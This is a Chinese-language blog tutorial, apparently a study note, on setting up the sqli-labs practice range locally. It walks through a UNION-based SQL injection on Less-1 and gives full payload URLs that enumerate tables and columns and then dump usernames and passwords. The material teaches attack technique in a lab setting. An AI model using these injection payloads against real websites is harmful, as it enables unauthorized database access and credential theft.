<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="renderer" content="webkit">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <meta name="google-site-verification" content="TZE0rZyIqLl10trYu3BWBWa1Vmz6HFwhb2OcNEK4u-s" />
     <link rel="shortcut icon" href= /img/favicon.ico >
    <title>
        Hexo
    </title>
    <meta name="description" content= 嘿，我是刘训灼～这是我的子站，用于展示写的Hexo主题：Coder。欢迎访问！ >
    <meta name="keywords" content= Blog,Hexo,Theme,刘训灼,LiuXunzhuo >
    
<link rel="stylesheet" href="/libs/highlight/styles/monokai-sublime.css">

    
<link rel="stylesheet" href="/libs/font-awesome/css/font-awesome.min.css">

    
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 7.0.0"></head>
<body id="bodyx">
    <div class="hd posts">
    <a href="/index.html"><i class="fa fa-home
 replay-btn" aria-hidden="true"></i></a>
    <div class="post-title">
        <p>
            搭建靶场环境
        </p>
        <hr>
    </div>
    <div class="post-content">
        <h2 id="安装PHP5-5-9，HackBar"><a href="#安装PHP5-5-9，HackBar" class="headerlink" title="安装PHP5.5.9，HackBar"></a>安装PHP5.5.9，HackBar</h2><p>1.打开虚拟机win10hei的PHPstudy，启动Apache和Mtsql，在软件管理的php界面下载php5.5.9，<br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251206444.png" alt="image.png"><br>2.在下图的路径输入cmd,在输入以下命令：</p>
<p><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251206916.png" alt="image.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">mysql  -u root -p</span><br><span class="line">show databases；</span><br><span class="line">use security;</span><br><span class="line">show tables;</span><br><span class="line">select 1，2,3;</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251206489.png" alt="Image.png"><br>3.下载火狐插件HackBar 它可以发包。把这个插件安装到浏览器。按键盘上的F12可以唤起它。<br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251207206.png" alt="image.png"><br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251207661.png" alt="image.png"><br><img src="https://cdn.nlark.com/yuque/0/2023/png/40675946/1703080911381-9f3e0491-4687-4014-9a3e-7ff1e1eb5b26.png#averageHue=%23fdfdfc&clientId=ubff8c9cd-c1a6-4&from=paste&height=246&id=u2e8da43d&originHeight=465&originWidth=932&originalType=binary&ratio=1&rotation=0&showTitle=false&size=46892&status=done&style=none&taskId=u2fffe0cc-97c8-48b7-b0bb-05eef7a0369&title=&width=494" alt="image.png"><br>4.information_schema是在mysql5.0之后产生的（面试题考点)</p>
<h2 id="SQL联合注入步骤"><a href="#SQL联合注入步骤" class="headerlink" title="SQL联合注入步骤"></a>SQL联合注入步骤</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">联合(union)的顺序:查表-&gt;查字段名-&gt;查字段</span><br><span class="line"></span><br><span class="line">SQL查表</span><br><span class="line">select 1,group_concat(table_name) ,3 from information_schema.tables where table_schema=database();-- -</span><br><span class="line"></span><br><span class="line">SQL查字段名</span><br><span class="line">select 1,group_concat(column_name) ,3 from information_schema.columns where table_name=&#x27;users&#x27; and table_schema=database();-- -</span><br><span class="line"></span><br><span class="line">SQL查字段</span><br><span class="line">select group_concat(id,&quot;~&quot;,username,&quot;~&quot;,password) from users ;-- -     //这三条语句必记</span><br></pre></td></tr></table></figure>

<p>1.把sqli文件复制到phpstudy的根目录下，使用php5.5.9，打开网站，点击sqli，进入第一关<br><img src="https://cdn.nlark.com/yuque/0/2023/png/40675946/1703081834980-d182d068-33e3-4409-a6a4-66d6b1d7520b.png#averageHue=%23eabd77&clientId=ubff8c9cd-c1a6-4&from=paste&height=299&id=ud9568135&originHeight=299&originWidth=463&originalType=binary&ratio=1&rotation=0&showTitle=false&size=19721&status=done&style=none&taskId=u29c70ce1-62b9-4193-92df-e2ccb0d56eb&title=&width=463" alt="image.png"><br>2.格式：本地地址或虚拟机地址&#x2F;sqli&#x2F;Less-1&#x2F;?id&#x3D;x   union      xxxxxxxxxxxxxxxx    – -<br>注意：x的值为-1或0         – -为SQL的注释<br>3.先判断是否闭合，输入？id&#x3D;1  再点击Excute发包。<br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251207139.png" alt="image.png"><br>4.然后在1后面加 ‘ 发现报错，如图，有5个分号，1和5抵消，2和3抵消，剩下4，说明没有闭合，1’就是我们要找的。<br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251207337.png" alt="image.png"><br>5.其次，开始查表，把1改成0，在0’后面加一个空格，然后加union ，在union后面加查表语句  select 1,group_concat(table_name) ,3 from information_schema.tables where table_schema&#x3D;database();  这条语句后要加 – -   将后面的内容注释掉。<br>最终语句为<br><code>[http://localhost/sqli/Less-1/?id=0&#39;](http://localhost/sqli/Less-1/?id=0&#39;)  union select 1,group_concat(table_name) ,3 from information_schema.tables where table_schema=database();-- -</code></p>
<p><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251207008.png" alt="image.png"><br>6.查字段名，把原来语句的基础上，把查表语句改成查字段语句，然后加上– -<br><code>[http://localhost/sqli/Less-1/?id=0&#39;](http://localhost/sqli/Less-1/?id=0&#39;)  union select 1,group_concat(column_name) ,3 from information_schema.columns where table_name=&#39;users&#39; and table_schema=database();-- -</code></p>
<p><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251207168.png" alt="image.png"><br>7.最后查字段，把原来语句的基础上，把查字段名语句改成查字段语句，在 group_concat(id,”<del>“,username,”</del>“,password)的group前加上     1，      在password）后面加    ,3       最后再完整语句后加上– -<br><code>[http://localhost/sqli/Less-1/?id=0&#39;](http://localhost/sqli/Less-1/?id=0&#39;)  union select 1, group_concat(id,&quot;~&quot;,username,&quot;~&quot;,password),3 from users ;-- -</code></p>
<p>8.最终得到我们想要的整列的username和整列的password<br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251207227.png" alt="Image.png"></p>

    </div>

    
        <hr class="fhr">
        <div id="vcomments"></div>
    
</div>
    <div class="footer" id="footer">
    <p><h4>Copyright © 2020 | Author: Your Name | Theme By <a class="theme-author" target="_blank" rel="noopener" href="https://github.com/Xunzhuo/hexo-theme-coder" style="font-size:14px; color: #969696">Coder</a></h4>
    
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        <span id="busuanzi_container_site_pv">Page Views: <span id="busuanzi_value_site_pv"></span></span>
        <span class="post-meta-divider">|</span>
        <span id="busuanzi_container_site_uv">Unique Visitors: <span id="busuanzi_value_site_uv"></span></span>
    
    <label class="el-switch el-switch-blue el-switch-sm" style="vertical-align: sub;">
        <input type="checkbox" name="switch" id="update_style">
        <span class="el-switch-style"></span>
    </label>

    <!--         <script type="text/javascript">
    var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");
    document.write(unescape("%3Cspan id='cnzz_stat_icon_1278548644'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "v1.cnzz.com/stat.php%3Fid%3D1278548644%26show%3Dpic1' type='text/javascript'%3E%3C/script%3E"));
    </script> -->
</p>
</div>

<input type="hidden" id="web_style" value="black">
<input type="hidden" id="valine_appid" value="">
<input type="hidden" id="valine_appKey" value="">

<script src="/libs/jquery.min.js"></script>


<script src="/libs/highlight/highlight.pack.js"></script>

<script src='//cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js'></script>

<script src="/js/js.js"></script>

<style type="text/css">
.v * {
color: #698fca;
}
.v .vlist .vcard .vhead .vsys {
color: #3a3e4a;
}
.v .vlist .vcard .vh .vmeta .vat {
color: #638fd5;
}
.v .vlist .vcard .vhead .vnick {
color: #6ba1ff;
}
.v a {
color: #8696b1;
}
.v .vlist .vcard .vhead .vnick:hover {
color: #669bfc;
}
</style>
    <script type="text/javascript" color="173,174,173" opacity='1' zIndex="-2" count="99" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
</body>
</html>
